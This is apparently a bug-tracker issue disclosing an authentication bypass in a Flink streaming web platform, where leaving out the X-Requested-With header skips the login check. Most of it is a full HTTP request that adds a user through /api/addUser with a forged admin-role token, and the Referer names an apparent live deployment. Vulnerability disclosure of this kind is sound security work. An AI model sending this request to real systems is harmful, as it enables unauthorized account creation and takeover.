Open v1f18 opened 7 months ago
In the interceptor, if it is not an ajax request, the authentication will be canceled directly, resulting in permission bypass. In fact, X-Requested-With: XMLHttpRequest can be bypassed if the request header does not exist
test payload
POST /api/addUser HTTP/1.1 Host: *** User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Referer: https://panflinkweb.lingzhuyun.com/static/ui/index.html Content-Length: 50 Origin: *** Connection: keep-alive Cookie: flink-streaming-platform-web-sessionid=eyJuYW1lIjoidGVzdCIsInBhc3N3b3JkIjoiYTU5MGE3NDU5ODFlYjM0ZTU2ZWY5MzBmNDJkNjMzZDgiLCJ1c2VyaWQiOjJ9; Admin-Token={%22id%22:2%2C%22username%22:%22test%22%2C%22name%22:%22test%22%2C%22avatar%22:%22avatar.gif%22%2C%22introduction%22:%22%22%2C%22roles%22:[%22admin%22]} Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: same-origin Content-Type: application/x-www-form-urlencoded Pragma: no-cache Cache-Control: no-cache name=test3&fullname=test&pwd1=test321&pwd2=test321
test payload